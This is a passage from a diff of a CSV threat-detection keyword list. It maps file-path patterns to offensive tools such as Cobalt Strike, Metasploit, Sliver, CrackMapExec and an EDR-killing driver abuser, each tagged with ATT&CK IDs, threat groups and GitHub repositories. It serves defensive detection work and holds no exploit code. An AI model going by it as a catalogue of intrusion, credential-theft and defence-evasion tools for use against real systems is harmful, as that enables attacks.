Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/Privileger.git*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*/PrivKit.git*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/PrivKit/*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/proberbyte.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*/process_herpaderping/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/process_herpaderping/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/Process-Instrumentation-Syscall-Hook*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prometheus.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" -"*/protocols/ftp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/ldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/mssql.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/smb.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/protocols/ssh.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ftp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/mssql.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/smb.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ssh.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/proxy/Tor.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/proxy/tor_paths.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/Proxy_Def_File_Generator.cna*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/proxychains.git*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" -"*/proxymaybeshell*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/ps_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/ps1_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PS2EXE.git*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*/proxymaybeshell*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ps_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/ps1_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PS2EXE.git*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*/ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/PS2EXE/*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*/PS2EXE/*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*/ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*/psexec.json*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/psnuffle*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/psexec.json*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/psnuffle*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer 